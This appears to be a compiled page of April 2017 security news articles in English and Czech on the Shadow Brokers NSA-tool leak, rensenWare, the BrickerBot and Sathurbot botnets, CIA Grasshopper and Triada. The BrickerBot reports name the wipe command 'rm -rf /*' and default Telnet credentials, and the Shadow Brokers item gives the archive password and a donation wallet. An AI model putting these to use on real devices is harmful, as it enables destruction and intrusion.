One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Languagehttps://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl …
5:53 PM - 8 Apr 2017
254 254 Retweets 262 262 likes
If you want, the group is still accepting donations, below its Bitcoin wallet: 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK
That received a total of 10.41198465 bitcoins
Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hackers group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA and gained popularity last year for leaking a portion of those tools is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA's hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after failed auction, the group put up those hacking tools and exploits for direct sale on an underground website, categorizing them into a type — like "exploits," "Trojans," and "implant" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers has finally released password for the encrypted cache of NSA's files, allowing anyone to unlock and download the auction data dump.
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing political views expressed by the Shadow Brokers on Trump's recent policies and events, like the Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.
A security researcher, who uses Twitter handle x0rz, has uploaded all files after decryption on Github and confirmed that the archive includes:
rpc.cmsd a remote root zero-day exploit for Solaris – Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
The evidence of the NSA operators' access inside the GSM network of Mobilink, one of the Pakistan's popular mobile operator companies.
More key findings will come as soon as other security researchers delve into the dump.
At the time, it's not confirmed whether the group holds more NSA hacking tools and exploits or this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.
RensenWare ransomware – You will decrypt files only scoring .2 Billion in TH12 Game
8.4.2017 securityaffairs Virus
The rensenWare ransomware rather than demanding money, it requires the victims to score “over 0.2 billion” playing “TH12 game.
Security experts at MalwareHunterTeam have spotted a new ransomware dubbed ‘rensenWare’. The ransomware is very strange, rather than demanding money, it requires the victims to score “over 0.2 billion” playing “TH12 — Undefined Fantastic Object”.
The RensenWare ransomware would scan a machine for certain file types and used the AES-256 to encrypt the files. When the malware encrypts a file it would append the .RENSENWARE extension to it.
When RensenWare ransomware completes the file encrytion, it displays a ransom note featuring Captain Minamitsu Murasa from the Touhou Project series of shooting games made by Team Shanghai Alice.
The ransomware note tells the victims that they must score over .2 billion in the Lunatic level of a Touhou Project game called TH12 ~ Undefined Fantastic Object. If the victim does not reach that score or close the ransomware, he will not able to rescue the files forever.
“That’s easy. You just play TH12 ~ Undefined Fantastic Object and score over 0.2 billion in LUNATIC level. this application will detect TH12 process and score automatically. DO NOT TRY CHEATING OR TEMRMINATE THIS APPLICATION IF YOU DON’T WANT TO BLOW UP THE ENCRYPTION KEY!” reads the ransom note.
Follow
MalwareHunterTeam @malwrhunterteam
Found a surprising ransomware today: "rensenWare".
Not asks for any money, but to play a game until you reach a score - and it's not a joke.
7:05 PM - 6 Apr 2017
4,522 4,522 Retweets 4,266 4,266 likes
“A new ransomware called RensenWare was discovered today by MalwareHunterTeam that makes a unique ransom demand; score over 0.2 billion in the LUNATIC level of TH12 ~ Undefined Fantastic Object or kiss your files goodbye!” wrote Lawrence Abrams from BleepingComputers. “While I do not think this ransomware was ever meant to be distributed, it shows what a creative developer can do to torment their victims.”
The RensenWare ransomware will monitor the gaming progress of the victim by looking for a process called “th12.” The malware reads the processes memory to determine the current score and level of the game. When the victim reaches the Lunatic level and has scored over .2 billion points, the ransomware will save the key to the Desktop and initiate the decryption process.
Lawrence Abrams excludes that the rensenWare ransomware was developed for criminal purposes, “this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed.”
During the encryption operation, the malware doesn’t try to delete shadow volumes or make any other action to prevent a victim from restoring their files. This suggests the ransomware was created as a joke or to only disturb a specific group of people.
The author of the ransomware Tvple Eraser explained its intent with a message shared on Twitter:
Follow
Tvple Eraser @0x00000Ff
Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day
3:00 PM - 7 Apr 2017
Retweets 4 4 likes
The rensenWare ransomware demonstrates the great creativity of the community of malware coders, the experts have no doubt, we will see many other ‘creative’ themes the future.
This malware doesn’t represent a threat, but it has the potential to become it.
Brickerbot botnet, the thingbot that permanently destroys IoT devices
8.4.2017 securityaffairs BotNet
Security researchers have spotted a new threat dubbed Brickerbot botnet that causes permanent damage to Internet of Things (IoT) devices.
Months ago we anticipated the possible spike in the number of IoT botnets, at the beginning it was Mirai, but later other dangerous thingbot appeared in the wild such as the Leet Botnet and the Amnesia botnet.
Now a new botnet, dubbed Brickerbot, appeared in the threat landscape, it was spotted by researchers at Radware that have found many similarities with the dreaded Mirai botnet.
The main difference with Mirai botnet is that this threat permanently destroys poorly configured IoT devices.
The Brickerbot botnet was discovered on March 20 when researchers at Radware observed attacks against one of its honeypots.
“Over a four-day period, Radware’s honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage.”reads the analysis shared by Radware. “Besides this intense, short-lived bot (BrickerBot.1), Radware’s honeypot recorded attempts from a second, very similar bot (BrickerBot.2) which started PDoS attempts on the same date – both bots were discovered less than one hour apart –with lower intensity but more thorough and its location(s) concealed by TOR egress nodes.”
The honeypot logged 1,895 infection attempts by Brickerbot botnet in just four days, most of the attacks were originated from Argentina, while 333 attempts came from a Tor node.
The Brickerbot botnet leverages on Telnet brute force to compromise an IoT device, a technique like the Mirai’s one.
The Bricker does not try to download a binary, this means that experts from Radware were not able to retrieve the complete list of credentials used by the bot brute force attempts, the researchers were only able to record that the first attempted username/password pair was ‘root’/’vizxv.’
“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.'” continues the advisory.
The malicious code targets Linux-based IoT devices running the BusyBox toolkit which have their Telnet port open and exposed on the Internet.
The PDoS attempt attacks s originated from a limited number of IP addresses, the IoT devices are exposing the port 22 (SSH) and running an older version of the Dropbear SSH server. The vast majority of the devices Shodan as Ubiquiti network devices.
Once the malware has infected the device it starts scrambling the onboard memory using rm -rf /* and disabling TCP timestamps. It also limits the max number of kernel threads to one.
Brickerbot malware also flushes all iptables firewall and NAT rules and adds a rule to drop all outgoing packets. It tries to wipe all code on the vulnerable IoT making them unusable.
Experts at Radware provided the following suggestions to protect IoT Devices:
Change the device’s factory default credentials.
Disable Telnet access to the device.
Network Behavioral Analysis can detect anomalies in traffic and combine with automatic signature generation for protection.
User/Entity behavioral analysis (UEBA) to spot granular anomalies in traffic early.
An IPS should block Telnet default credentials or reset telnet connections. Use a signature to detect the provided command sequences.
Každý čtvrtý útok má na svědomí virus Danger
8.4.2017 Novinky/Bezpečnost Viry
Škodlivý kód Danger se několik posledních měsíců drží na samotném vrcholu žebříčku nejrozšířenějších virových hrozeb. A jinak tomu nebylo ani v uplynulém měsíci, kdy byl tento nezvaný návštěvník zodpovědný za každý čtvrtý počítačový útok. Vyplývá to z analýzy antivirové společnosti Eset.
Na přelomu loňského a letošního roku počet detekovaných útoků, který měl Danger na svědomí, citelně klesal. V posledních týdnech jej však počítačoví piráti opět nasazují stále častěji.
A evidentně se jim to vyplácí. Tento škodlivý kód totiž otevírá zadní vrátka do operačního systému. Útočníci pak díky němu mohou propašovat do napadeného počítače další škodlivé kódy, nejčastěji tak šíří vyděračské viry z rodiny ransomware.
Chtějí výkupné
Tyto škodlivé kódy začnou šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit, jinak se ke svým datům údajně již nikdy nedostane.
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.
Hrozbu, která nese plný název JS/Danger.ScriptAttachment, se tedy rozhodně nevyplácí podceňovat. Záškodník se šíří především přes nevyžádané e-maily. Právě na ty by si tak uživatelé měli dávat největší pozor. Na první pohled lákavá sleva, či dokonce nějaká výhra totiž nemusí být skutečná a může se za ní ukrývat právě Danger.
„Z pohledu uživatele a prevence je důležité být obezřetný a neotevírat každou přílohu, zvláště pokud je vám odesílatel či samotný e-mail podezřelý. Fakt, že se Danger v České republice drží tak dlouho na výsluní, dokládá, že jde o účinný malware, pomocí kterého si útočníci stále dokáží najít dost obětí,“ řekl Miroslav Dvořák, technický ředitel společnosti Eset.
Danger není jedinou hrozbou
Mezi downloadery patří i druhý v březnu nejčetněji zachycený malware – Nemucod. „Jeho podíl meziměsíčně vzrostl téměř na dvojnásobek únorové hodnoty, dosáhl takřka devíti procent,“ konstatoval Dvořák.
„Novým zástupcem v přehledu deseti nejčastějších internetových hrozeb je trojský kůň Java/QRat. Jde o variantu Remote Acces Trojanu pro Javu. Utočníci ho využívají jako zadní vrátka pro vzdálený přístup do systému napadeného zařízení, obvykle k úniku citlivých dat,“ uzavřel Dvořák.
Seznam deseti nejrozšířenějších hrozeb za měsíc březen naleznete v tabulce níže:
Top 10 hrozeb v České republice za březen 2017:
1. JS/Danger.ScriptAttachment (25,90 %)
2. JS/TrojanDownloader.Nemucod (8,84 %)
3. Java/GRat (5,48 %)
4. Win32/Adware.ELEX (4,60 %)
5. JS/Chromex.Submeliux (2,39 %)
6. Win32/Deceptor.AdvancedSystemCare (1,72 %)
7. Java/Adwind (1,59 %)
8. Win32/Packed.VMProtect.ABO (1,57 %)
9. Win32/Obfuscated.NIT (1,53 %)
10. Win32/Packed.VMProtect.AAA (1,43 %)
Zdroj: Eset
Podle IBM X-Force uniklo v roce 2016 historicky nejvíce dat
8.4.2017 SecurityWorld Kriminalita
Divize IBM Security uveřejnila výsledky Indexu bezpečnostních hrozeb IBM X-Force za rok 2016. Množství uniklých dat vzrostlo z 600 milionů na více než 4 miliardy, což je historický nárůst o 566 %.
Vedle tradičních oblastí, na které kyberzločinci cílí, jako jsou kreditní karty, hesla a informace o zdravotním stavu obětí, zaznamenal tým IBM X-Force významný posun ve strategii útočníků. V roce 2016 se řada významných úniků týkala nestrukturovaných dat, jako jsou e-mailové archivy, obchodní dokumenty, duševní vlastnictví nebo zdrojový kód.
Index bezpečnostních hrozeb IBM X-Force sestává z pozorování více než 8 000 monitorovaných klientů s nainstalovaným bezpečnostním řešením ve stovce zemí a také z dat získaných díky zařízením jakými jsou například detektory spamu nebo honeynety (systémy, které záměrně přitahují potenciální útočníky a sledují jejich počínání). IBM X-Force provozuje síťové pasti po celém světě a denně monitoruje více než osm milionů spamových a phishingových útoků. Dále analyzuje přes 37 miliard webových stránek a obrázků.
V jiné loňské studii divize IBM Security zjistila, že 70 % firem zasažených ransomwarem zaplatilo přes 10 000 dolarů výměnou za navrácení přístupu k firemním údajům a systémům. Podle odhadů FBI dostali kyberzločinci využívající ransomware za první tři měsíce roku 2016 zaplaceno 209 milionů dolarů. Tímto tempem si tak kyberzločinci jen za minulý rok mohli malwarem vydělat téměř miliardu dolarů.
Vidina zisku a rostoucí ochota firem platit dodala loni kyberzločincům odvahu uskutečnit dvojnásobné množství ransomwarových útoků. Nejjednodušším způsobem, jak doručit ransomware do počítače oběti, jsou přílohy se spamem v e-mailových zprávách. Vloni se tak meziročně zvýšil počet spamů o 400 %, přičemž zhruba 44 % spamů obsahovalo nebezpečné přílohy. Ransomware se v roce 2016 vyskytoval v 85 % těchto nebezpečných příloh.
V roce 2015 se pod náporem útočníků nejvíce ocitaly zdravotnické organizace, přičemž finanční služby zaujímaly třetí místo. V roce 2016 se však zločinci znovu zaměřili především na finančnictví. Tento sektor má tedy nezáviděníhodné prvenství v počtu útoků, které na něj cílí.
Údaje ze zprávy X-Force ale ukazují, že pokud jde o počet skutečně uniklých záznamů, je finančnictví na třetí příčce. Nižší úspěšnost útoků ve finančním oboru dokládá, že nepřetržité investice do bezpečnostních opatření jsou do značné míry účinné.
Ze zdravotnického sektoru i přes neustále vysoký počet incidentů uniklo daleko méně dat. Útočníci se totiž zaměřovali na menší cíle. V roce 2016 došlo ve zdravotnictví k úniku „pouhých“ 12 milionů záznamů, což ho řadí mimo pět nejvíce postižených odvětví. Pro srovnání – v roce 2015 došlo k úniku téměř 100 milionů zdravotnických záznamů. Údaj z roku 2016 je tedy o 88 % nižší. V minulém roce zaznamenaly nejvyšší počet incidentů a uniklých záznamů společnosti poskytující informační a komunikační služby a také státní úřady.
Sathurbot botnet, over 20,000 bots launched a distributed WordPress password attack
8.4.2017 securityaffairs BotNet
Experts observed a new threat targeting WordPress install, the Sathurbot botnet attempts to bruteforce WordPress accounts.
Once compromised a WordPress website, the Sathurbot botnet uses it to spread the malware.
The Sathurbot leverages torrents as a delivery mechanism, once a website is compromised it is used to host fake movie and software torrents. When victims search for a movie or a software to download they will receive malicious links instead of torrents.
Users will be served with the movie and the software torrent both containing an executable that once launched is tasked of loading the Sathurbot DLL.
“The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file.” reads the analysis published by ESET.”The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL”
Once executed the Sathurbot Trojan notify the victims that their machine has become a bot in the Sathurbot botnet.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.” states ESET.
Once infected the target site, the malware reports its successful installation to the C&C server and communicate also a listening port to the server. Periodically it contacts the C&C and while waiting for additional instructions.
Sathurbot botnet also implement black SEO technique to make malicious links available through the major search engines.
“Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.” continues ESET.
“From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.”
According to the experts, operators of the botnet are also interested in targeting websites running other CMSs such as Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks.
The bot sends the harvested domains to the C&C formatted as login:password@domain. The credentials are used to gain access to the website, operators implemented a distributed WordPress password attack using different bots to try different login credentials for the same site. The tactic allows attackers to avoid being blocked, each bot only tries a single login per site and moves to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET adds.
The bot integrates the libtorrent library to implement a Torrent seeder. A binary file is downloaded and a torrent is created.
The experts noticed that not all bots in the network perform all of the above functions, some of them only work as web crawlers, others are used to brute force the websites and not all bots work as a seeder.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.” concludes ESET.
Experts speculate the Sathurbot botnet has been active since at least June 2016.
“Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.”
WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonged to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are basically a user manual that the agency flagged as "secret" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, Grasshopper framework allows the agency members to easily create custom malware, depending upon the technical details, such as what operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
BrickerBot Damages IoT Device Firmware
8.4.2017 securityweek IoT
Security researchers have identified a new type of cyber attack causes damage to Internet of Things (IoT) devices, rather than ensnaring them into a botnet.
Dubbed Permanent Denial-of-Service (PDoS), the attacks can be highly damaging, resulting in the need to replace or reinstall hardware, researchers explain: security flaws are abused to destroy the firmware and/or basic functions of system.
One of the tools used to launch such attacks is called BrickerBot, and Radware researchers observed two variants starting March 20, 2017. One of them, however, had a short life and remains inactive, while the other continues to operate. Both, however, have had the same purpose: to compromise IoT devices and corrupt their storage.
Both bots started PDoS attempts on the same date and they were discovered within one hour of each other. However, while the first showed intense activity over its short life, the second displayed lower intensity, but has been more thorough in its attacks and has been also concealing its location using TOR (The Onion Router) egress nodes.
To compromise devices, BrickerBot uses Telnet brute force, a method previously associated with the Mirai botnet, which abused infected devices to launch distributed denial of service (DDoS) attacks.
Once it has successfully accessed a device, the PDoS bot performs a series of Linux commands meant to ultimately corrupt storage. Next, it also attempts to disrupt Internet connectivity and device performance, and to wipe all files on the device.
“Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium),” Radware researchers reveal.
The attack is targeted specifically at Linux/BusyBox-based IoT devices that have the Telnet port open and exposed publically on the Internet. These are the same type of devices that Mirai and related IoT botnets have been targeting.
The recorded PDoS attempts originated from a limited number of IP addresses worldwide, with all devices exposing port 22 (SSH) and running an older version of the Dropbear SSH server. These were identified as Ubiquiti network devices.
The security researchers also identified a second type of PDoS attempts, with a different command signature, which hid their source IP addresses behind TOR nodes. Still ongoing, these attacks attempt to brute-force the Telnet login using the root/root and root/vizxv username-password pairs, use more thorough commands, and target a much broader range of storage devices.
These attacks don’t use 'busybox' but attempt both 'dd' and 'cat,’ whichever is available on the breached device, the researchers say. In the end, these attacks also attempt to remove the default gateway, wipe devices, and disable TCP timestamps. With the help of extra commands, the attackers attempt to flush all iptables firewall and NAT rules and add a rule to drop all outgoing packets.
WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers
Wikileaks published a new batch of 27 documents detailing the Grasshopper framework used by its agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents included in the CIA Vault 7 archive, on Friday published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.
The Grasshopper framework allows CIA operators to build a custom payload, run it and analyzed the results of the execution.
The leaked documents compose a user guide classified as “secret” that was available to the CIA cyber spies.
“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.
The dropper described in the Grasshopper manual should be loaded and executed only in memory, the framework allows creating custom malware that is able to compromise the target system bypassing the antivirus it is using.
“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”
Each executable generated with the Grasshopper framework contains one or more installers.
The framework offers to the operators various persistence mechanisms that can define a series of rules that need to be met before an installation is launched. The rules allow attackers to target specific systems specifying its technical details (i.e. x64 or x32 architecture, OS).
“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.
One of the persistence mechanisms reported in the user guide is called Stolen Goods, basically, the CIA exploited the mechanisms implemented by the malicious codes used by crooks in the wild.
For example, the CIA has modified some components of the popular Carberp rootkit.
“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”
Another persistence mechanism leverages the Windows Update Service to allow the execution of the payload on every system boot or every 22 hours, this technique uses a series of DLLs specified in the registry.
WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.
Sathurbot Botnet Targets WordPress Accounts
8.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.
Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.
Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.
Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.
The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.
Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results in used to harvest domain names.
The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.
The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.
“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.
The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.
“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.
Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.
WikiLeaks Details CIA Tool for Creating Windows Malware Installers
8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools
WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.
The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.
Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.
One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.
WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.
“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.
This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.
An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.
Android Trojan Uses Sandbox to Evade Detection
8.4.2017 securityweek Android
The Triada malware, said last year to be the most advanced mobile threat, recently boosted its detection evasion capabilities with the adoption of sandbox technology, Avast security researchers reveal.
Detailed for the first time in March last year, the malware was observed leveraging the Zygote process to hook all applications on a device. Featuring a modular architecture, the Trojan was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user.
Recently, Triada started using the open source sandbox DroidPlugin, which is designed to dynamically load and run an app without actually installing it. With the help of this sandbox, Triada loads malicious APK plugins, thus running them without having to install them on the device. Because of this practice, anti-virus solutions have a hard time detecting the malware, because its malicious components are not stored in the host app.
The malware is being distributed with the help of social engineering tactics, by deceiving victims into downloading the malware. Once installed, the threat hides its icon from the phone’s desktop and starts stealing personal information in the background, without ever alerting the victim.
While the earliest variant of the malware didn’t use DroidPlugin, a new variant that emerged in November started integrating it, Avast researchers explain. Around the same time the new Triada variant emerged, the malware author reportedly submitted an issue to DroidPlugin to report an out-of-memory bug.
According to Avast, the malware disguises itself as Wandoujia, a famous Android app store in China. Furthermore, it was observed hiding all of its malicious APK plugins in the asset directory, for DroidPlugin to run.
“Each of these plugins has its own dedicated malicious action to spy on the victim, including file stealing, radio monitoring, and more. One of the plugins communicates with a remote command and control (C&C) server, which instructs which activities should be carried out. These are then carried out by the other APKs,” the researchers say.
Avast also explains that the malware developer didn’t integrate the malicious plugins into an application, but instead opted for the use of DroidPlugin sandbox to dynamically load and run them specifically to bypass antivirus detections. The host application doesn’t include malicious actions, and antivirus solution won’t detect and blog the host app.
Only a couple of cases of malware using sandboxes for their nefarious purposes have been observed so far, but more instances might emerge. “While it can be convenient to use a sandbox to run an app without installing it, sandboxes can also be used maliciously by malware,” Avast concludes.
Joke "rensenWare" Ransomware Challenges Gamers
8.4.2017 securityweek Virus
Researchers have discovered a strange new ransomware called 'rensenWare'. Rather than demanding money for decryption, it requires the victim to score "over 0.2 billion" playing "TH12 -- Undefined Fantastic Object". Victims are told that the score will be monitored, and decryption will be automatic on success, provided there is no attempt to cheat.
Analysis by Lawrence Abrams subsequently concluded that rensenWare is not effectively coded for it to be serious ransomware. "As the developer is not looking to generate revenue from this ransomware," he concluded, "this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed."
This seems to have been confirmed by the author, Tvple Eraser on Twitter: "Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day". rensenWare seems to have been a bit of fun by a gamer/hacker, and that's all.
That seems to be the feeling of the security industry. "Never say never, but I don't think we'll see much copycat efforts spawning from rensenware," Sean Sullivan, Security Advisor at F-Secure told SecurityWeek. Nevertheless, he added, "There was some interesting 'Kirk' ransomware the other week (and Spock was the cure). So I think we'll see continued amounts of 'creative' themes, but they'll be asking for Bitcoin, not high scores."
But hard-core gaming has its own sub-culture. SecurityWeek approached two hard-cores. One responded, "Oh, yes, most definitely this will provoke some copycat jokes and viruses." This is worth watching, because 'vendettas' among gamers are not unknown.
The other added, "In retrospect, I'm surprised no-one has done a ransomware like this already." He added that there's not much 'buzz' on the gaming scene yet, possibly because it's so new; but continued "I'd say there's a reasonable chance of it sparking a new 'subgenre' of ransomware viruses (challengeware?) and I can even see a toned-down version of it being used in viral marketing campaigns."
Right now, the basic concept developed by Tvple Eraser is not a threat -- but it has the potential to become one, or at last a nuisance. In fact, it could already be described as a nuisance. Googling 'rensenware' will generate a string of websites providing information on a threat that arguably does not exist, but all offering to remove it (and other ransomware/viruses) with a simple download.
That download is invariably SpyHunter. SpyHunter used to thought of as 'rogueware'. It has fought this description vigorously, including in the courts. It has sued both BleepingComputer after a poor review, and Malwarebytes for classifying it as a PUP (potentially unwanted program). SecurityWeek asked Malwarebytes if it still treats SpyHunter as a PUP.
"Enigma's SpyHunter?" replied malware intelligence researcher Pieter Arntz; "Yes, definitely."
Vulnerability in Apple Music for Android could be exploited to steal user data
7.4.2017 securityaffairs Apple
Apple fixed a vulnerability tracked as CVE-2017-2387 in the Apple Music for Android that could allow attackers to launch MitM attacks on the application.
